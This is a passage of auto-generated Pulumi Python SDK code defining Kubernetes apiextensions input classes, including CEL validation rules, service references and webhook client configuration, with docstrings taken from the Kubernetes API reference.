@x_kubernetes_list_type.setter
def x_kubernetes_list_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_list_type", value)
@property
@pulumi.getter
def x_kubernetes_map_type(self) -> Optional[pulumi.Input[str]]:
"""
x-kubernetes-map-type annotates an object to further describe its topology. This extension must only be used when type is object and may have 2 possible values:
1) `granular`:
These maps are actual maps (key-value pairs) and each fields are independent
from each other (they can each be manipulated by separate actors). This is
the default behaviour for all maps.
2) `atomic`: the list is treated as a single entity, like a scalar.
Atomic maps will be entirely replaced when updated.
"""
return pulumi.get(self, "x_kubernetes_map_type")
@x_kubernetes_map_type.setter
def x_kubernetes_map_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "x_kubernetes_map_type", value)
@property
@pulumi.getter
def x_kubernetes_preserve_unknown_fields(self) -> Optional[pulumi.Input[bool]]:
"""
x-kubernetes-preserve-unknown-fields stops the API server decoding step from pruning fields which are not specified in the validation schema. This affects fields recursively, but switches back to normal pruning behaviour if nested properties or additionalProperties are specified in the schema. This can either be true or undefined. False is forbidden.
"""
return pulumi.get(self, "x_kubernetes_preserve_unknown_fields")
@x_kubernetes_preserve_unknown_fields.setter
def x_kubernetes_preserve_unknown_fields(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "x_kubernetes_preserve_unknown_fields", value)
@property
@pulumi.getter
def x_kubernetes_validations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]]:
"""
x-kubernetes-validations describes a list of validation rules written in the CEL expression language. This field is an alpha-level. Using this field requires the feature gate `CustomResourceValidationExpressions` to be enabled.
"""
return pulumi.get(self, "x_kubernetes_validations")
@x_kubernetes_validations.setter
def x_kubernetes_validations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ValidationRuleArgs']]]]):
pulumi.set(self, "x_kubernetes_validations", value)
@pulumi.input_type
class ServiceReferencePatchArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None):
"""
ServiceReference holds a reference to Service.legacy.k8s.io
:param pulumi.Input[str] name: name is the name of the service. Required
:param pulumi.Input[str] namespace: namespace is the namespace of the service. Required
:param pulumi.Input[str] path: path is an optional URL path at which the webhook will be contacted.
:param pulumi.Input[int] port: port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if path is not None:
pulumi.set(__self__, "path", path)
if port is not None:
pulumi.set(__self__, "port", port)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
name is the name of the service. Required
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
namespace is the namespace of the service. Required
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
path is an optional URL path at which the webhook will be contacted.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@pulumi.input_type
class ServiceReferenceArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str],
path: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None):
"""
ServiceReference holds a reference to Service.legacy.k8s.io
:param pulumi.Input[str] name: name is the name of the service. Required
:param pulumi.Input[str] namespace: namespace is the namespace of the service. Required
:param pulumi.Input[str] path: path is an optional URL path at which the webhook will be contacted.
:param pulumi.Input[int] port: port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
if path is not None:
pulumi.set(__self__, "path", path)
if port is not None:
pulumi.set(__self__, "port", port)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
name is the name of the service. Required
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
namespace is the namespace of the service. Required
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
path is an optional URL path at which the webhook will be contacted.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
port is an optional service port at which the webhook will be contacted. `port` should be a valid port number (1-65535, inclusive). Defaults to 443 for backward compatibility.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@pulumi.input_type
class ValidationRulePatchArgs:
def __init__(__self__, *,
field_path: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
message_expression: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None,
rule: Optional[pulumi.Input[str]] = None):
"""
ValidationRule describes a validation rule written in the CEL expression language.
:param pulumi.Input[str] field_path: fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
:param pulumi.Input[str] message: Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
:param pulumi.Input[str] message_expression: MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
:param pulumi.Input[str] reason: reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
:param pulumi.Input[str] rule: Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
"""
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if message is not None:
pulumi.set(__self__, "message", message)
if message_expression is not None:
pulumi.set(__self__, "message_expression", message_expression)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if rule is not None:
pulumi.set(__self__, "rule", rule)
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[pulumi.Input[str]]:
"""
fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
"""
return pulumi.get(self, "field_path")
@field_path.setter
def field_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "field_path", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter(name="messageExpression")
def message_expression(self) -> Optional[pulumi.Input[str]]:
"""
MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
"""
return pulumi.get(self, "message_expression")
@message_expression.setter
def message_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_expression", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter
def rule(self) -> Optional[pulumi.Input[str]]:
"""
Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
"""
return pulumi.get(self, "rule")
@rule.setter
def rule(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule", value)
@pulumi.input_type
class ValidationRuleArgs:
def __init__(__self__, *,
rule: pulumi.Input[str],
field_path: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
message_expression: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
ValidationRule describes a validation rule written in the CEL expression language.
:param pulumi.Input[str] rule: Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
:param pulumi.Input[str] field_path: fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
:param pulumi.Input[str] message: Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
:param pulumi.Input[str] message_expression: MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
:param pulumi.Input[str] reason: reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
"""
pulumi.set(__self__, "rule", rule)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if message is not None:
pulumi.set(__self__, "message", message)
if message_expression is not None:
pulumi.set(__self__, "message_expression", message_expression)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def rule(self) -> pulumi.Input[str]:
"""
Rule represents the expression which will be evaluated by CEL. ref: https://github.com/google/cel-spec The Rule is scoped to the location of the x-kubernetes-validations extension in the schema. The `self` variable in the CEL expression is bound to the scoped value. Example: - Rule scoped to the root of a resource with a status subresource: {"rule": "self.status.actual <= self.spec.maxDesired"}
If the Rule is scoped to an object with properties, the accessible properties of the object are field selectable via `self.field` and field presence can be checked via `has(self.field)`. Null valued fields are treated as absent fields in CEL expressions. If the Rule is scoped to an object with additionalProperties (i.e. a map) the value of the map are accessible via `self[mapKey]`, map containment can be checked via `mapKey in self` and all entries of the map are accessible via CEL macros and functions such as `self.all(...)`. If the Rule is scoped to an array, the elements of the array are accessible via `self[i]` and also by macros and functions. If the Rule is scoped to a scalar, `self` is bound to the scalar value. Examples: - Rule scoped to a map of objects: {"rule": "self.components['Widget'].priority < 10"} - Rule scoped to a list of integers: {"rule": "self.values.all(value, value >= 0 && value < 100)"} - Rule scoped to a string value: {"rule": "self.startsWith('kube')"}
The `apiVersion`, `kind`, `metadata.name` and `metadata.generateName` are always accessible from the root of the object and from any x-kubernetes-embedded-resource annotated objects. No other metadata properties are accessible.
Unknown data preserved in custom resources via x-kubernetes-preserve-unknown-fields is not accessible in CEL expressions. This includes: - Unknown field values that are preserved by object schemas with x-kubernetes-preserve-unknown-fields. - Object properties where the property schema is of an "unknown type". An "unknown type" is recursively defined as:
- A schema with no type and x-kubernetes-preserve-unknown-fields set to true
- An array where the items schema is of an "unknown type"
- An object where the additionalProperties schema is of an "unknown type"
Only property names of the form `[a-zA-Z_.-/][a-zA-Z0-9_.-/]*` are accessible. Accessible property names are escaped according to the following rules when accessed in the expression: - '__' escapes to '__underscores__' - '.' escapes to '__dot__' - '-' escapes to '__dash__' - '/' escapes to '__slash__' - Property names that exactly match a CEL RESERVED keyword escape to '__{keyword}__'. The keywords are:
"true", "false", "null", "in", "as", "break", "const", "continue", "else", "for", "function", "if",
"import", "let", "loop", "package", "namespace", "return".
Examples:
- Rule accessing a property named "namespace": {"rule": "self.__namespace__ > 0"}
- Rule accessing a property named "x-prop": {"rule": "self.x__dash__prop > 0"}
- Rule accessing a property named "redact__d": {"rule": "self.redact__underscores__d > 0"}
Equality on arrays with x-kubernetes-list-type of 'set' or 'map' ignores element order, i.e. [1, 2] == [2, 1]. Concatenation on arrays with x-kubernetes-list-type use the semantics of the list type:
- 'set': `X + Y` performs a union where the array positions of all elements in `X` are preserved and
non-intersecting elements in `Y` are appended, retaining their partial order.
- 'map': `X + Y` performs a merge where the array positions of all keys in `X` are preserved but the values
are overwritten by values in `Y` when the key sets of `X` and `Y` intersect. Elements in `Y` with
non-intersecting keys are appended, retaining their partial order.
"""
return pulumi.get(self, "rule")
@rule.setter
def rule(self, value: pulumi.Input[str]):
pulumi.set(self, "rule", value)
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[pulumi.Input[str]]:
"""
fieldPath represents the field path returned when the validation fails. It must be a relative JSON path (i.e. with array notation) scoped to the location of this x-kubernetes-validations extension in the schema and refer to an existing field. e.g. when validation checks if a specific attribute `foo` under a map `testMap`, the fieldPath could be set to `.testMap.foo` If the validation checks two lists must have unique attributes, the fieldPath could be set to either of the list: e.g. `.testList` It does not support list numeric index. It supports child operation to refer to an existing field currently. Refer to [JSONPath support in Kubernetes](https://kubernetes.io/docs/reference/kubectl/jsonpath/) for more info. Numeric index of array is not supported. For field name which contains special characters, use `['specialName']` to refer the field name. e.g. for attribute `foo.34$` appears in a list `testList`, the fieldPath could be set to `.testList['foo.34$']`
"""
return pulumi.get(self, "field_path")
@field_path.setter
def field_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "field_path", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
Message represents the message displayed when validation fails. The message is required if the Rule contains line breaks. The message must not contain line breaks. If unset, the message is "failed rule: {Rule}". e.g. "must be a URL with the host matching spec.host"
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter(name="messageExpression")
def message_expression(self) -> Optional[pulumi.Input[str]]:
"""
MessageExpression declares a CEL expression that evaluates to the validation failure message that is returned when this rule fails. Since messageExpression is used as a failure message, it must evaluate to a string. If both message and messageExpression are present on a rule, then messageExpression will be used if validation fails. If messageExpression results in a runtime error, the runtime error is logged, and the validation failure message is produced as if the messageExpression field were unset. If messageExpression evaluates to an empty string, a string with only spaces, or a string that contains line breaks, then the validation failure message will also be produced as if the messageExpression field were unset, and the fact that messageExpression produced an empty string/string with only spaces/string with line breaks will be logged. messageExpression has access to all the same variables as the rule; the only difference is the return type. Example: "x must be less than max ("+string(self.max)+")"
"""
return pulumi.get(self, "message_expression")
@message_expression.setter
def message_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_expression", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
reason provides a machine-readable validation failure reason that is returned to the caller when a request fails this validation rule. The HTTP status code returned to the caller will match the reason of the reason of the first failed validation rule. The currently supported reasons are: "FieldValueInvalid", "FieldValueForbidden", "FieldValueRequired", "FieldValueDuplicate". If not set, default to use "FieldValueInvalid". All future added reasons must be accepted by clients when reading this value and unknown reasons should be treated as FieldValueInvalid.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class WebhookClientConfigPatchArgs:
def __init__(__self__, *,
ca_bundle: Optional[pulumi.Input[str]] = None,
service: Optional[pulumi.Input['ServiceReferencePatchArgs']] = None,
url: Optional[pulumi.Input[str]] = None):
"""
WebhookClientConfig contains the information to make a TLS connection with the webhook.
:param pulumi.Input[str] ca_bundle: caBundle is a PEM encoded CA bundle which will be used to validate the webhook's server certificate. If unspecified, system trust roots on the apiserver are used.
:param pulumi.Input['ServiceReferencePatchArgs'] service: service is a reference to the service for this webhook. Either service or url must be specified.
If the webhook is running within the cluster, then you should use `service`.
:param pulumi.Input[str] url: url gives the location of the webhook, in standard URL form (`scheme://host:port/path`). Exactly one of `url` or `service` must be specified.
The `host` should not refer to a service running in the cluster; use the `service` field instead. The host might be resolved via external DNS in some apiservers (e.g., `kube-apiserver` cannot resolve in-cluster DNS as that would be a layering violation). `host` may also be an IP address.
Please note that using `localhost` or `127.0.0.1` as a `host` is risky unless you take great care to run this webhook on all hosts which run an apiserver which might need to make calls to this webhook. Such installs are likely to be non-portable, i.e., not easy to turn up in a new cluster.
The scheme must be "https"; the URL must begin with "https://".
A path is optional, and if present may be any string permissible in a URL. You may use the path to pass an arbitrary string to the webhook, for example, a cluster identifier.
Attempting to use a user or basic auth e.g. "user:password@" is not allowed. Fragments ("#...") and query parameters ("?...") are not allowed, either.
"""
if ca_bundle is not None:
pulumi.set(__self__, "ca_bundle", ca_bundle)
if service is not None:
pulumi.set(__self__, "service", service)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="caBundle")
def ca_bundle(self) -> Optional[pulumi.Input[str]]:
"""
caBundle is a PEM encoded CA bundle which will be used to validate the webhook's server certificate. If unspecified, system trust roots on the apiserver are used.
"""
return pulumi.get(self, "ca_bundle")
@ca_bundle.setter
def ca_bundle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_bundle", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input['ServiceReferencePatchArgs']]:
"""
service is a reference to the service for this webhook. Either service or url must be specified.
If the webhook is running within the cluster, then you should use `service`.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input['ServiceReferencePatchArgs']]):
pulumi.set(self, "service", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
url gives the location of the webhook, in standard URL form (`scheme://host:port/path`). Exactly one of `url` or `service` must be specified.
The `host` should not refer to a service running in the cluster; use the `service` field instead. The host might be resolved via external DNS in some apiservers (e.g., `kube-apiserver` cannot resolve in-cluster DNS as that would be a layering violation). `host` may also be an IP address.
Please note that using `localhost` or `127.0.0.1` as a `host` is risky unless you take great care to run this webhook on all hosts which run an apiserver which might need to make calls to this webhook. Such installs are likely to be non-portable, i.e., not easy to turn up in a new cluster.
The scheme must be "https"; the URL must begin with "https://".
A path is optional, and if present may be any string permissible in a URL. You may use the path to pass an arbitrary string to the webhook, for example, a cluster identifier.
